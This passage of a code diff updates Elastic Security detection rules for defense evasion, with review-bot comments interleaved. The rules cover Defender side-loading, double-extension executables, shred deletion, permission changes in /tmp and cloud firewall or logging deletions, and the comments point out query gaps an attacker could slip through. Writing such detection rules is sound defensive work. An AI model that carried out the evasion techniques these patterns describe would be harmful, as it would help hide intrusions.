--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_windefend_unusual_path.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_windefend_unusual_path.json
@@ -16,13 +16,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential DLL Side-Loading via Microsoft Antimalware Service Executable", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n (process.pe.original_file_name == \"MsMpEng.exe\" and not process.name : \"MsMpEng.exe\") or\n (process.name : \"MsMpEng.exe\" and not\n process.executable : (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Security Client\\\\*.exe\"))\n", "references": [ "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", 
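Review bot: The `query` on the new side has an operator-precedence problem that the new `required_fields` entry for `event.type` makes visible: in EQL `and` binds tighter than `or`, so `event.type == "start"` gates only the first disjunct, and the second branch (`process.name : "MsMpEng.exe" and not process.executable : (...)`) fires on any process event for MsMpEng.exe, not just starts. Wrapping the two alternatives in one group, `event.type == "start" and ((process.pe.original_file_name == "MsMpEng.exe" and not process.name : "MsMpEng.exe") or (process.name : "MsMpEng.exe" and not process.executable : (...)))`, makes the rule match its declared required fields and avoids duplicate alerts on non-start events. This logic predates the hunk, but the version bump to 5 is a natural place to correct it.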
@@ -57,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_creation_mult_extension.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_creation_mult_extension.json index a97d811683d38..c922efd29c54a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_creation_mult_extension.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_creation_mult_extension.json 
@@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Executable File Creation with Multiple Extensions", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type == \"creation\" and file.extension : \"exe\" and\n file.name regex~ \"\"\".*\\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\\.exe\"\"\"\n", + "note": "", + "query": "file where event.type == \"creation\" and file.extension : \"exe\" and\n file.name regex~ \"\"\".*\\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\\.exe\"\"\" and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Users\\\\*\\\\QGIS_SCCM\\\\Files\\\\QGIS-OSGeo4W-*-Setup-x86_64.exe\") and\n file.path : \"?:\\\\Program Files\\\\QGIS *\\\\apps\\\\grass\\\\*.exe\") and\n not process.executable : (\"/bin/sh\", \"/usr/sbin/MailScanner\", \"/usr/bin/perl\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", 
"severity": "medium", "tags": [ "Elastic", @@ -39,9 +67,9 @@ "reference": "https://attack.mitre.org/techniques/T1036/", "subtechnique": [ { - "id": "T1036.004", - "name": "Masquerade Task or Service", - "reference": "https://attack.mitre.org/techniques/T1036/004/" + "id": "T1036.007", + "name": "Double File Extension", + "reference": "https://attack.mitre.org/techniques/T1036/007/" } ] } @@ -72,5 +100,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_deletion_via_shred.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_deletion_via_shred.json index 6d86f27cd52b4..cbfec77f7aa0d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_deletion_via_shred.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_deletion_via_shred.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "File Deletion via Shred", "query": "event.category:process and event.type:(start or process_started) and process.name:shred and\n process.args:(\"-u\" or \"--remove\" or \"-z\" or \"--zero\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a1329140-8de3-4445-9f87-908fb6d824f4", "severity": "low", @@ -48,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } 
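Review bot: The Linux exclusion added to the `query`, `not process.executable : ("/bin/sh", "/usr/sbin/MailScanner", "/usr/bin/perl")`, is unscoped, so any double-extension `.exe` written by a shell or perl process is ignored, which is exactly how a script-based dropper would stage a `invoice.pdf.exe`. If this was added for MailScanner quarantine noise, scoping it the way the msiexec/QGIS exception is scoped, with an `and file.path : "<quarantine dir>/*"` clause, keeps the rule useful on Linux hosts. Two smaller things in the same line: the alternation lists `txt` twice, and the QGIS installer path hard-codes `C:\\Users\\...` while the neighbouring pattern uses the `?:` drive wildcard, presumably unintentionally. The move from T1036.004 to T1036.007 (Double File Extension) is a good correction.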
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_mod_writable_dir.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_mod_writable_dir.json index be7e8b71694ba..d3f90a2c91f79 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_mod_writable_dir.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_mod_writable_dir.json @@ -15,6 +15,33 @@ "license": "Elastic License v2", "name": "File Permission Modification in Writable Directory", "query": "event.category:process and event.type:(start or process_started) and\n process.name:(chmod or chown or chattr or chgrp) and\n process.working_directory:(/tmp or /var/tmp or /dev/shm) and\n not user.name:root\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9f9a2a82-93a8-4b1a-8778-1780895626d4", "severity": "low", @@ -44,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_firewall_policy_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_firewall_policy_deletion.json index 7d5bf5af25ea6..3a290c0c59e7d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_firewall_policy_deletion.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_firewall_policy_deletion.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Firewall Policy Deletion", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/firewall-manager/policy-overview" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e02bd3ea-72c6-4181-ac2b-0f83d17ad969", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -56,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_from_unusual_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_from_unusual_directory.json new file mode 100644 index 0000000000000..8d64d3218396e --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_from_unusual_directory.json 
@@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Execution from an Unusual Directory", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n /* add suspicious execution paths here */\nprocess.executable : (\"C:\\\\PerfLogs\\\\*.exe\",\"C:\\\\Users\\\\Public\\\\*.exe\",\"C:\\\\Windows\\\\Tasks\\\\*.exe\",\"C:\\\\Intel\\\\*.exe\",\"C:\\\\AMD\\\\Temp\\\\*.exe\",\"C:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n\"C:\\\\Windows\\\\ServiceState\\\\*.exe\",\"C:\\\\Windows\\\\security\\\\*.exe\",\"C:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\"C:\\\\Windows\\\\Branding\\\\*.exe\",\"C:\\\\Windows\\\\csc\\\\*.exe\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\"C:\\\\Windows\\\\en-US\\\\*.exe\",\"C:\\\\Windows\\\\wlansvc\\\\*.exe\",\"C:\\\\Windows\\\\Prefetch\\\\*.exe\",\"C:\\\\Windows\\\\Fonts\\\\*.exe\",\n \"C:\\\\Windows\\\\diagnostics\\\\*.exe\",\"C:\\\\Windows\\\\TAPI\\\\*.exe\",\"C:\\\\Windows\\\\INF\\\\*.exe\",\"C:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\",\"C:\\\\windows\\\\tracing\\\\*.exe\",\n \"c:\\\\windows\\\\IME\\\\*.exe\",\"c:\\\\Windows\\\\Performance\\\\*.exe\",\"c:\\\\windows\\\\intel\\\\*.exe\",\"c:\\\\windows\\\\ms\\\\*.exe\",\"C:\\\\Windows\\\\dot3svc\\\\*.exe\",\n \"C:\\\\Windows\\\\panther\\\\*.exe\",\"C:\\\\Windows\\\\RemotePackages\\\\*.exe\",\"C:\\\\Windows\\\\OCR\\\\*.exe\",\"C:\\\\Windows\\\\appcompat\\\\*.exe\",\"C:\\\\Windows\\\\apppatch\\\\*.exe\",\"C:\\\\Windows\\\\addins\\\\*.exe\",\n 
\"C:\\\\Windows\\\\Setup\\\\*.exe\",\"C:\\\\Windows\\\\Help\\\\*.exe\",\"C:\\\\Windows\\\\SKB\\\\*.exe\",\"C:\\\\Windows\\\\Vss\\\\*.exe\",\"C:\\\\Windows\\\\Web\\\\*.exe\",\"C:\\\\Windows\\\\servicing\\\\*.exe\",\"C:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"C:\\\\Windows\\\\Logs\\\\*.exe\",\"C:\\\\Windows\\\\WaaS\\\\*.exe\",\"C:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\"C:\\\\Windows\\\\ShellComponents\\\\*.exe\",\"C:\\\\Windows\\\\PLA\\\\*.exe\",\n \"C:\\\\Windows\\\\Migration\\\\*.exe\",\"C:\\\\Windows\\\\debug\\\\*.exe\",\"C:\\\\Windows\\\\Cursors\\\\*.exe\",\"C:\\\\Windows\\\\Containers\\\\*.exe\",\"C:\\\\Windows\\\\Boot\\\\*.exe\",\"C:\\\\Windows\\\\bcastdvr\\\\*.exe\",\n \"C:\\\\Windows\\\\assembly\\\\*.exe\",\"C:\\\\Windows\\\\TextInput\\\\*.exe\",\"C:\\\\Windows\\\\security\\\\*.exe\",\"C:\\\\Windows\\\\schemas\\\\*.exe\",\"C:\\\\Windows\\\\SchCache\\\\*.exe\",\"C:\\\\Windows\\\\Resources\\\\*.exe\",\n \"C:\\\\Windows\\\\rescache\\\\*.exe\",\"C:\\\\Windows\\\\Provisioning\\\\*.exe\",\"C:\\\\Windows\\\\PrintDialog\\\\*.exe\",\"C:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\"C:\\\\Windows\\\\media\\\\*.exe\",\n \"C:\\\\Windows\\\\Globalization\\\\*.exe\",\"C:\\\\Windows\\\\L2Schemas\\\\*.exe\",\"C:\\\\Windows\\\\LiveKernelReports\\\\*.exe\",\"C:\\\\Windows\\\\ModemLogs\\\\*.exe\",\"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\") and\n not process.name : (\"SpeechUXWiz.exe\",\"SystemSettings.exe\",\"TrustedInstaller.exe\",\"PrintDialog.exe\",\"MpSigStub.exe\",\"LMS.exe\",\"mpam-*.exe\") and\n not process.executable :\n (\"?:\\\\Intel\\\\Wireless\\\\WUSetupLauncher.exe\",\n \"?:\\\\Intel\\\\Wireless\\\\Setup.exe\",\n \"?:\\\\Intel\\\\Move Mouse.exe\",\n \"?:\\\\windows\\\\Panther\\\\DiagTrackRunner.exe\",\n \"?:\\\\Windows\\\\servicing\\\\GC64\\\\tzupd.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\RemoteLite.exe\",\n \"?:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\*.exe\",\n \"?:\\\\Users\\\\Public\\\\Documents\\\\syspin.exe\",\n 
\"?:\\\\Users\\\\Public\\\\res\\\\FileWatcher.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Windows", + "Threat Detection", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_frontdoor_firewall_policy_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_frontdoor_firewall_policy_deletion.json index a0b97a358ff07..afc0b209ff530 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_frontdoor_firewall_policy_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_frontdoor_firewall_policy_deletion.json
@@ -14,13 +14,38 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Frontdoor Web Application Firewall (WAF) Policy Deleted",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE\" and event.outcome:(Success or success)\n",
 "references": [
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#networking"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "09d028a5-dcde-409f-8ae0-557cef1b7082",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -56,5 +81,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_created.json
index ff2a20f85d3e3..1339f91df6d0c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_created.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_created.json
@@ -2,7 +2,7 @@
 "author": [
 "Elastic"
 ],
- "description": "Identifies when a firewall rule is created in Google Cloud Platform (GCP). Virtual Private Cloud (VPC) firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances. An adversary may create a new firewall rule in order to weaken their target's security controls and allow more permissive ingress or egress traffic flows for their benefit.",
+ "description": "Identifies when a firewall rule is created in Google Cloud Platform (GCP) for Virtual Private Cloud (VPC) or App Engine. These firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances or specific applications. An adversary may create a new firewall rule in order to weaken their target's security controls and allow more permissive ingress or egress traffic flows for their benefit.",
 "false_positives": [
 "Firewall rules may be created by system administrators. Verify that the firewall configuration change was expected. Exceptions can be added to this rule to filter expected behavior."
 ],
@@ -13,13 +13,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Firewall Rule Creation",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.firewalls.insert\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:(*.compute.firewalls.insert or google.appengine.*.Firewall.Create*Rule)\n",
 "references": [
- "https://cloud.google.com/vpc/docs/firewalls"
+ "https://cloud.google.com/vpc/docs/firewalls",
+ "https://cloud.google.com/appengine/docs/standard/python/understanding-firewalls"
+ ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
 ],
 "risk_score": 21,
 "rule_id": "30562697-9859-4ae0-a8c5-dab45d664170",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -48,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_deleted.json
index 3fc9b6bc49d3d..3a9e602fba8c2 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_deleted.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_deleted.json
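Review bot: The rewritten query narrows the dataset filter to `event.dataset:gcp.audit`, so any events still carrying the previously accepted `googlecloud.audit` value silently stop matching, while the `setup` string added in the same hunk still says a Filebeat module is acceptable without naming the dataset it must produce; make the requirement explicit, e.g. `"setup": "The GCP Fleet integration, Filebeat gcp module (gcp.audit dataset), or similarly structured data is required to be compatible with this rule."`. The new `event.action:(*.compute.firewalls.insert or ...)` also introduces a leading wildcard on a keyword field where the old `v*.compute.firewalls.insert` did not; leading wildcards are markedly more expensive on large audit indices and may be subject to the `query:allowLeadingWildcards` setting, so keeping the `v*` prefix (with a separate `beta.` term if needed, as the VPC route creation rule in this diff does) is the safer form. The same dataset narrowing and, for the firewall deletion and modification hunks, the same leading-wildcard pattern apply to the GCP firewall rule deletion, firewall rule modification, logging bucket deletion, logging sink deletion, Pub/Sub subscription deletion, Pub/Sub topic deletion, storage bucket configuration and storage bucket permissions hunks that follow.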
@@ -2,7 +2,7 @@
 "author": [
 "Elastic"
 ],
- "description": "Identifies when a firewall rule is deleted in Google Cloud Platform (GCP). Virtual Private Cloud (VPC) firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances. An adversary may delete a firewall rule in order to weaken their target's security controls.",
+ "description": "Identifies when a firewall rule is deleted in Google Cloud Platform (GCP) for Virtual Private Cloud (VPC) or App Engine. These firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances or specific applications. An adversary may delete a firewall rule in order to weaken their target's security controls.",
 "false_positives": [
 "Firewall rules may be deleted by system administrators. Verify that the firewall configuration change was expected. Exceptions can be added to this rule to filter expected behavior."
 ],
@@ -13,13 +13,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Firewall Rule Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.firewalls.delete\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:(*.compute.firewalls.delete or google.appengine.*.Firewall.Delete*Rule)\n",
 "references": [
- "https://cloud.google.com/vpc/docs/firewalls"
+ "https://cloud.google.com/vpc/docs/firewalls",
+ "https://cloud.google.com/appengine/docs/standard/python/understanding-firewalls"
+ ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
 ],
 "risk_score": 47,
 "rule_id": "ff9b571e-61d6-4f6c-9561-eb4cca3bafe1",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -48,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_modified.json
index e6ad1fc554183..51edd488e69fb 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_modified.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_modified.json
@@ -2,7 +2,7 @@
 "author": [
 "Elastic"
 ],
- "description": "Identifies when a firewall rule is modified in Google Cloud Platform (GCP). Virtual Private Cloud (VPC) firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances. An adversary may modify a firewall rule in order to weaken their target's security controls.",
+ "description": "Identifies when a firewall rule is modified in Google Cloud Platform (GCP) for Virtual Private Cloud (VPC) or App Engine. These firewall rules can be modified to allow or deny connections to or from virtual machine (VM) instances or specific applications. An adversary may modify an existing firewall rule in order to weaken their target's security controls and allow more permissive ingress or egress traffic flows for their benefit.",
 "false_positives": [
 "Firewall rules may be modified by system administrators. Verify that the firewall configuration change was expected. Exceptions can be added to this rule to filter expected behavior."
 ],
@@ -13,13 +13,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Firewall Rule Modification",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.firewalls.patch\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:(*.compute.firewalls.patch or google.appengine.*.Firewall.Update*Rule)\n",
 "references": [
- "https://cloud.google.com/vpc/docs/firewalls"
+ "https://cloud.google.com/vpc/docs/firewalls",
+ "https://cloud.google.com/appengine/docs/standard/python/understanding-firewalls"
+ ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
 ],
 "risk_score": 47,
 "rule_id": "2783d84f-5091-4d7d-9319-9fceda8fa71b",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -48,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_bucket_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_bucket_deletion.json
index 73033ad852590..88f712ea82514 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_bucket_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_bucket_deletion.json
@@ -13,14 +13,38 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Logging Bucket Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.logging.v*.ConfigServiceV*.DeleteBucket and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.DeleteBucket and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/logging/docs/buckets",
 "https://cloud.google.com/logging/docs/storage"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "5663b693-0dea-4f2e-8275-f1ae5ff2de8e",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -49,5 +73,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 7
